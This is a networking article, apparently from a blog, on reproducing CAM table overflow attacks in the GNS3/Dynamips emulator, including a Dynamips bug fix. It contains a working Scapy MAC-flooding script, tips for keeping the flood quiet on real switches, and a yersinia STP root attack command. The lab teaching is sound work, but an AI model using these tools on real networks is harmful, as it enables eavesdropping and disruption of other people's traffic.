<span class="cm"> *</span>
<span class="cm"> * NM-16ESW ethernet switch module (experimental!)</span>
<span class="cm"> *</span>
<span class="cm"> * It's an attempt of proof of concept, so not optimized at all at this …</span></pre></div></td></tr></table></div><h3 id="knowing-where-difference-with-real-gears-lies"><a class="toclink" href="#knowing-where-difference-with-real-gears-lies">Knowing where difference with real gears lies</a></h3>
<p>For performance reasons, a lot of switch things are actually not part of the
<span class="caps">IOS</span> code but are implemented in hardware.
This includes the <span class="caps">ARL</span>, or <a href="http://computernetworkingsimplified.com/data-link-layer/basic-theory-operation-l2-switch/" rel="external">Address Resolution Logic</a>, which provides all the
methods to add, remove and lookup entries in the <span class="caps">MAC</span> address table.</p>
<p>Therefore, for the <span class="caps">NM</span>-<span class="caps">16ESW</span> module to work in <span class="caps">GNS3</span>, Dynamips had to reimplement
all these normally hardware provided services, or at least push this far enough
to allow an unmodified <span class="caps">IOS</span> to run on it correctly.</p>
<p>The sad thing is indeed that this is unfinished work, as stated in this
<a href="https://github.com/GNS3/dynamips/blob/master/common/dev_nm_16esw.c" rel="external">module’s source code</a> header:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre> 1
2
3
4
5
6
7
8
9
10
11</pre></div></td><td class="code"><div class="codehilite"><pre><span class="cm">/*</span>
<span class="cm"> * Cisco router simulation platform.</span>
<span class="cm"> * Copyright (c) 2006 Christophe Fillot (cf@utc.fr)</span>
<span class="cm"> *</span>
<span class="cm"> * NM-16ESW ethernet switch module (experimental!)</span>
<span class="cm"> *</span>
<span class="cm"> * It's an attempt of proof of concept, so not optimized at all at this time.</span>
<span class="cm"> * Only L2 switching will be managed (no L3 at all).</span>
<span class="cm"> *</span>
<span class="cm"> * To do next: QoS features (CoS/DSCP handling).</span>
<span class="cm"> */</span>
</pre></div>
</td></tr></table></div>
<p>So you’re warned: forget about QoS and expect some oddities.</p>
<p>Hopefully here we are not dealing with QoS but with <span class="caps">CAM</span> overflow, and except
the final bug (of which the correction should be included in a future versoin
of <span class="caps">GNS3</span>) there are two main oddities which are of concern to us: one is
affecting the <span class="caps">MAC</span> address table size and the other the <span class="caps">MAC</span> address aging process.</p>
<h4 id="first-difference-the-mac-address-table-size-tops-at-8189-entries"><a class="toclink" href="#first-difference-the-mac-address-table-size-tops-at-8189-entries">First difference: the <span class="caps">MAC</span> address table size tops at 8189 entries</a></h4>
<p>This is actually a non-issue.</p>
<p>The <span class="caps">CAM</span> overflow attack exploits the fact that a switch is not able to add any
new entry to its <span class="caps">CAM</span> table, and therefore fallbacks into <em>“behaving like a hub”</em>
(as it is often described, I’ll come on this later).</p>
<p>Most probably due to a minor bug, it seems that the <span class="caps">MAC</span> table is considered
full at 8189 entries instead of 8192. However, full still means full: the <span class="caps">ARL</span>
should still fail to store any supplementary entry and the <span class="caps">CAM</span> overflow attack
should still be successful.</p>
<h4 id="second-difference-the-aging-time-setting-is-not-honored"><a class="toclink" href="#second-difference-the-aging-time-setting-is-not-honored">Second difference: the <code>aging-time</code> setting is not honored</a></h4>
<p>By default, <span class="caps">MAC</span> entries should remain the <span class="caps">MAC</span> address table for at least 5
minutes (=300 seconds), as defined by the <code>aging-time</code> setting:</p>
<div class="codehilite"><pre><span class="go">SW1#show mac-address-table aging-time</span>
<span class="go">Mac address aging time 300</span>
</pre></div>
<p>However, in real gear the whole process behind this parameter is implemented in
hardware, and this setting is currently simply ignored by Dynamips’
implementation of the <span class="caps">NM</span>-<span class="caps">16ESW</span> module.</p>
<p>Dynamips implements its own garbage collection system which deletes old <span class="caps">MAC</span>
entries after only 30 seconds, making <span class="caps">CAM</span> overflow attacks noticeably more
tricky to stabilize (but may be a good training against the <em>“backpressure”</em>
functionality, designed to allow faster <span class="caps">MAC</span> aging when there is a flood of new
addresses according to <a href="https://networkengineering.stackexchange.com/a/20319/27387" rel="external">Lukasz</a>.).</p>
<p>The code in charge of this can be found around line 2515 of the
<a href="https://github.com/GNS3/dynamips/blob/master/common/dev_nm_16esw.c" rel="external">dev_nm_16esw.c</a> file:</p>
<div class="codehilite"><pre><span class="cm">/* Start the MAC address ager */</span>
<span class="n">data</span><span class="o">-></span><span class="n">ager_tid</span> <span class="o">=</span> <span class="n">timer_create_entry</span><span class="p">(</span><span class="mi">15000</span><span class="p">,</span><span class="n">FALSE</span><span class="p">,</span><span class="mi">10</span><span class="p">,</span>
<span class="p">(</span><span class="n">timer_proc</span><span class="p">)</span><span class="n">bcm5600_arl_ager</span><span class="p">,</span><span class="n">data</span><span class="p">);</span>
</pre></div>
<p>This launches the <code>bcm5600_arl_ager()</code> function every 15 seconds. What this
function does is to scan the whole <span class="caps">CAM</span> table and check a hit flag associated to
each <span class="caps">MAC</span> address:</p>
<ul>
<li>If the flag is set, unset it.</li>
<li>If the flag is unset, delete the <span class="caps">MAC</span> address from the table.</li>
</ul>
<p>This flag is re-enabled whenever the switch receives a new packet from the
corresponding <span class="caps">MAC</span> address, keeping active addresses in the table.</p>
<p>You <em>will</em> have to take this behavior into account in order to design a
successful <span class="caps">CAM</span> overflow attack:</p>
<ul>
<li>
<p>Using only random <span class="caps">MAC</span> addresses will not do it (sorry <code>macof</code>…) since it
would allow the switch to flush all faked addresses at once every 30
seconds, making the exploit unstable.</p>
</li>
<li>
<p>Each <span class="caps">MAC</span> address must be used as a sender at least once every 15 seconds.</p>
</li>
<li>
<p>Actually due to possible issues caused by the increased load, in order to
avoid a single packet to be lost or arrive later you would prefer each <span class="caps">MAC</span>
address to be used two or three times in less than 15 seconds.
This should be enough to make your flood both stable and reliable, with <span class="caps">CAM</span>
tables consistently and constantly filled on all switches on the whole <span class="caps">LAN</span>.</p>
</li>
</ul>
<h3 id="understanding-what-you-can-really-expect"><a class="toclink" href="#understanding-what-you-can-really-expect">Understanding what you can really expect</a></h3>
<p>As explained in the introduction, a lot of literature explains this attack as
<em>“making the switch behave like a hub”</em>. While a good overview for the layman,
this oversimplified description is wrong from a technical point of view.</p>
<p>To explain this I will first detail how a switches works under normal
circumstances, what’s the algorithm behind them:</p>
<ol>
<li>
<p>The switch receives an incoming packet on a some port,</p>
</li>
<li>
<p>The switch then checks if the source <span class="caps">MAC</span> address is already stored in the
<span class="caps">MAC</span> address table.
If it isn’t and there is a free slot, it records this new <span class="caps">MAC</span> address
associated to its incoming port (and by the way if the address is already
present but associated to another port, it will update the record with the
new port).
This is also the occasion to reset the aging timer associated to this entry,
no matter if it is new or not.</p>
</li>
<li>
<p>The switch then checks if the destination <span class="caps">MAC</span> address is already stored in
the <span class="caps">MAC</span> address table. If it is, then this is all good and the switch
outputs the packet on the interface associated to the matching <span class="caps">CAM</span> table
entry.
If it isn’t, the switch outputs the packet on all interfaces except the
incoming one (all interfaces belonging to the same <span class="caps">VLAN</span> + trunk ports as
long as this <span class="caps">VLAN</span> is not pruned).</p>
</li>
</ol>
<p>Now, let’s see how a switch works when the <span class="caps">CAM</span> overflow condition has been
triggered and he did fallback into the so-called <em>“hub”</em> mode…
Actually all of this is just nonsense: there is no hub mode and the <span class="caps">CAM</span>
overflow triggered strictly nothing.
The switch just continues to work as it always did:</p>
<ol>
<li>
<p>On incoming packets, <em>if and only if</em> the source <span class="caps">MAC</span> address is not present
in the table will the <span class="caps">CAM</span> overflow have any effect since the switch will
have no free slot to add this new one and will therefore skip this step.
If the address is already present in the table, the switch will reset its
aging timer as usual.</p>
</li>
<li>
<p>On outgoing packets, <em>if and only if</em> the destination <span class="caps">MAC</span> address is not
present in the table will the switch indeed send the packet through “all”
of its interfaces.
If the <span class="caps">MAC</span> address is present in the table, the switch has strictly no
reason to act weirdly: it will simply proceed as usual and send the packet
only through the port associated to the <span class="caps">MAC</span> address.</p>
</li>
</ol>
<p>The main consequences of this are:</p>
<ul>
<li>
<p>Despite what is often told, <span class="caps">CAM</span> overflow attacks are not a magical way to
turn switches into hubs.
You will <em>not</em> be forwarded all the traffic passing through the switch.</p>
</li>
<li>
<p>You will <em>not</em> be able to eavesdrop any already active communication (ie.
any communication initiated before the <span class="caps">MAC</span> flood start). The devices’ <span class="caps">MAC</span>
address will be already known to the switch and legitimate packets will
regularly reset the switch’s aging counters.
No matter how hard you flood it these devices’ <span class="caps">MAC</span> addresses will stay in
the switch’s <span class="caps">CAM</span> table and the switch will only forward the traffic to the
appropriate ports.</p>
</li>
<li>
<p>You will most likely be able to eavesdrop <em>only</em> a one-side communication
from the router to previously inactive devices (shut down or in sleep mode
for instance).
In real world scenarios, at least during business hours the switch will
nearly permanently have the router’s <span class="caps">MAC</span> address in its <span class="caps">CAM</span> table since
almost any traffic on the network will pass through it and, therefore,
constantly refresh the aging timer.
The main goal of the <span class="caps">MAC</span> flood will therefore be to keep previously
inactive devices from successfully register their <span class="caps">MAC</span> address too onto the switch.</p>
<p>To give a concrete example of the result, most chances are that you will
not be able to eavesdrop the user’s password and requests, but you may be
able to get the server provided session identifiers and data.</p>
</li>
<li>
<p>But to end with depressing news, what you <em>will</em> achieve is that if you
take care to not overload the switches, they will happily forward your
flooding packets from switch-to-switch until they contaminate the whole
Layer 2 <span class="caps">LAN</span>.
Only <span class="caps">VLAN</span> pruning or a Layer 3 device on the way may limit this
dissemination, without that even switches offering only unrelated VLANs
ports will see their <span class="caps">CAM</span> table being filled-up.</p>
<p>In other words, depending on the topology details launching the attack from
<span class="caps">VLAN</span> 2 can allow you to access <span class="caps">VLAN</span> 2 traffic forwarded from several
switches away and can also allow you to affect <span class="caps">VLAN</span> 3 switches behavior.</p>
</li>
</ul>
<h3 id="using-the-right-tool"><a class="toclink" href="#using-the-right-tool">Using the right tool</a></h3>
<p>The tool classically recommended for <span class="caps">CAM</span> table overflow attacks is <code>macof</code>
(from the <a href="https://www.monkey.org/~dugsong/dsniff/" rel="external">dsniff</a> project, unmaintained for years).
However, this tool makes me the effect of a primitive barbarian from some
fantasy story: brutal, inefficient and unreliable.</p>
<p>This tool generates packets using fully random <span class="caps">MAC</span> addresses generated on the
fly.
This is wrong for two reasons:</p>
<ul>
<li>
<p>As we saw above, every inactive <span class="caps">MAC</span> addresses are automatically deleted
from the <span class="caps">CAM</span> table, temporarily freeing a large amount of slots available
to record genuine <span class="caps">MAC</span> addresses until we managed to fill the table again
(which may take a few time if the target is several switches away).
And as we also saw, a single genuine packet is sufficient to update the <span class="caps">CAM</span>
table with a true information and put a definitive end on our eavesdropping
on this particular target.</p>
</li>
<li>
<p>Statistically half of the randomly generated MACs have the
<a href="https://en.wikipedia.org/wiki/MAC_address#Address_details" rel="external">I/G group bit</a> set.
However, it is forbidden to use a group <span class="caps">MAC</span> address as sender, as stated in
<a href="http://standards.ieee.org/about/get/802/802.3.html" rel="external"><span class="caps">IEEE</span> 802.3-2002, Section 3.2.3(b)</a>:</p>
<blockquote>
<p>In the Source Address field, the first bit is reserved and set to 0.</p>
</blockquote>
<p>Cisco switches (and probably others) are aware of that, and consider such
packets as malformed and drop them.
This means that half of the packets generated by <code>macof</code> are dropped by the
first switch they encounter.</p>
</li>
</ul>
<p><code>macof</code> also relies on some brute-force strategy by sending its malicious
packets as fast as the attacker’s device and the network allows.</p>
<p>This cause several issues:</p>
<ul>
<li>
<p>Switches may malfunction or even crash during the flooding process (several
reports state that the switch’s management plane was frozen during such flooding).</p>
</li>
<li>
<p>Due to the load caused on switch-side, these packets may not be reliably
relayed from switch-to-switch, causing only the first attacker-facing switch to
have its <span class="caps">CAM</span> table effectively overflown.</p>
</li>
<li>
<p>Due to the load on attacker’s side, either the network card is fully
congested or the <span class="caps">CPU</span> usage maxes out. In all cases it is impossible to
capture any traffic from the same device, which is sad since capturing
traffic is precisely the goal of this attack. The usual advice is to stop
flooding when capturing, and alternate between flooding and capturing on a
regular basis (every minute for instance given the 5 minutes default aging
on real gears, and regarding Dynamips’ 30 seconds it becomes just hopeless).
I would also advise to have enough luck to be indeed capturing when
interesting information was being exchanged and enough luck to be able to
properly counter the periodic <span class="caps">MAC</span> table cleaning which seems pretty
unfeasible in such conditions.</p>
</li>
</ul>
<p>A good <span class="caps">CAM</span> overflow attack tool should:</p>
<ul>
<li>Not use more resources than necessary in order to allow a reliable eavesdropping.</li>
<li>Generate well-formed packets (ie. no useless packets which will get
dropped anyway and no packets which will make Wireshark (or an <span class="caps">IDS</span>…) complain).</li>
<li>Ensure that the <span class="caps">CAM</span> tables remain constantly filled so new devices will
have no chance to register their <span class="caps">MAC</span> address.</li>
</ul>
<p><code>macof</code> fails on these three requirements and is therefore not a suitable tool.
A quick search did not revealed any relevant alternative, so I went the
<a href="http://www.secdev.org/projects/scapy/" rel="external">Scapy</a> route (Scapy is a Python library and interactive tool allowing to
freely build and manipulate network packets).</p>
<p>Here is the code I used to successfully test <span class="caps">CAM</span> table overflow in a <span class="caps">GNS3</span> environment:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36</pre></div></td><td class="code"><div class="codehilite"><pre>#! /usr/bin/python
nbpkts = 8192
iface = "eth0"
import sys
from scapy.all import sendpfast, Ether, IP, RandIP, RandMAC, TCP
print("Initializing...")
# We first build all packets...
pkts = []
for i in xrange(0, nbpkts):
macaddr = str(RandMAC())
# Quick-and-dirty way to ensure that the I/G remains unset
macaddr = macaddr[:1] + "0" + macaddr[2:]
# This packet structure mimics a TCP SYN sent to a HTTP server.
# A random dst mac should also work, setting one fixed can be useful
# to easily filter-out flood-related packets when capturing traffic.
# You can use IPs valid for your range, but be cautious that if any
# host is made to send some RST for instance its MAC address will be
# registered by the switches.
pkts.append(Ether(src=macaddr, dst="ff:ff:ff:ff:ff:ff")/
IP(src=str(RandIP()), dst=str(RandIP()))/
TCP(dport=80, flags="S", options=[('Timestamp', (0, 0))]))
print("Launching attack, press Ctrl+C to stop...")
# ...and then we send them in loop.
while True:
# Adapt pps (Packets Per Second) to your needs. Running a complex
# GNS3 topology on a low-end machine will take all the CPU causing
# packet loss, pps will then need to be high to replay lost packets.
# Given enough CPU, packet loss can remain low and pps can be lowered
# too.
sendpfast(pkts, iface=iface, file_cache=True, pps=5000, loop=999)
</pre></div>
</td></tr></table></div>
<p>This is a quick-and-dirty, few-lines examples which could be improved in
several ways.
For instance, would it be used against real gears it may make sense to use two
successive sending iterations, the first one being quick in order to rapidly
take over <span class="caps">CAM</span> tables, and the second one working at a far more slowly pace,
taking full advantage of the 5 minutes aging delay to stay below the radar as
much as possible (when this default delay is changed, it is generally to be
raised and not diminished, and moreover I have some doubts that someone who do
not take care of enabling port security on his switches will really bother
changing such kind of setting).</p>
<h3 id="correct-a-bug-currently-affecting-dynamips"><a class="toclink" href="#correct-a-bug-currently-affecting-dynamips">Correct a bug currently affecting dynamips</a></h3>
<p>Sadly, when you are through all this, you will discover that when their <span class="caps">CAM</span>
table is properly filled, the switches in <span class="caps">GNS3</span> will not start to flood packets
through “all” of their ports, but they will drop them instead.</p>
<p>This is due to a bug affecting the <code>bcm5600_handle_rx_pkt()</code> function in charge
of handling received packets and located around line 2170 of the
<a href="https://github.com/GNS3/dynamips/blob/master/common/dev_nm_16esw.c" rel="external">dev_nm_16esw.c</a> file:</p>
<div class="codehilite"><pre><span class="cm">/* Source MAC address learning */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">bcm5600_src_mac_learning</span><span class="p">(</span><span class="n">d</span><span class="p">,</span><span class="n">p</span><span class="p">))</span>
<span class="k">return</span><span class="p">(</span><span class="n">FALSE</span><span class="p">);</span>
</pre></div>
<p>Currently, when the <span class="caps">ARL</span> failed to store a new <span class="caps">MAC</span> address, the handling of the
incoming packet is aborted, effectively resulting in it being drop.
The fix is just to ignore the <span class="caps">ARL</span> status and continue processing the packet
anyway, since this what real gear actually do:</p>
<div class="codehilite"><pre><span class="cm">/* Source MAC address learning */</span>
<span class="n">bcm5600_src_mac_learning</span><span class="p">(</span><span class="n">d</span><span class="p">,</span><span class="n">p</span><span class="p">);</span>
</pre></div>
<p>I’ve raised <a href="https://github.com/GNS3/dynamips/issues/72" rel="external">this issue</a> to <span class="caps">GNS3</span> teams so it can be fixed in <span class="caps">GNS3</span> future
updates.
I also advocated to <a href="https://github.com/GNS3/dynamips/issues/39" rel="external">raise the <span class="caps">MAC</span> table garbage collection timeout</a> from
the current 15 seconds to 5 minutes in order to be closer to real gear behavior.</p>
<p>Until this gets fixed upstream, it requires a manual modification and
recompilation of Dynamips source code but this is a very quick and simple
process (there is no need to recompile the whole <span class="caps">GNS3</span>, only the <code>dynamips</code>
binary, and I provided the patches in the tickets linked above).</p>
<h3 id="final-notes"><a class="toclink" href="#final-notes">Final notes</a></h3>
<p>After you do that, you will be able to test and repeat <span class="caps">MAC</span> overflow attacks in
<span class="caps">GNS3</span> with router-based switches in a stable and predictable manner.</p>
<p>Here are two final notes:</p>
<ul>
<li>
<p>While router-based switches allow to test <span class="caps">CAM</span> overflow attacks, they will
not allow to test proper mitigation techniques as they do not implement
port security.
I think this is a limitation from <span class="caps">IOS</span> rather than <span class="caps">GNS3</span> since the relevant
options are not even prevent in the shell.
<a href="http://evilrouters.net/cisco-iou-faq" rel="external"><span class="caps">IOU</span></a> proposes these options, however due to its <span class="caps">CAM</span> table allowing
nearly 200 million entries (compared to the 8192 of a real <span class="caps">IOS</span>) it seems
out of reach for a traditional <span class="caps">CAM</span> overflow attack. So <span class="caps">IOU</span> is at the
opposite of router-based switches: they can be used to test mitigation
techniques but not to reproduce the attack. Be aware also that <span class="caps">IOU</span>
implementation of the Spanning Tree Protocol (<span class="caps">STP</span>) is heavily buggy and
topology loops must be avoided.</p>
</li>
<li>
<p>Speaking of <span class="caps">STP</span> and depending on the topology, becoming <span class="caps">STP</span> Root
(<code>yersinia stp -attack 4</code>) should induce a clearing of most <span class="caps">MAC</span> tables
dynamic entries due to the topology change and may provide you a more
efficient flooding and eavesdropping experience ;).</p>
</li>
</ul>
<hr/>
<p class="footnote">Article based on a <a href="https://networkengineering.stackexchange.com/q/20313/27387#32567" rel="external">StackExchange answer</a>.</p>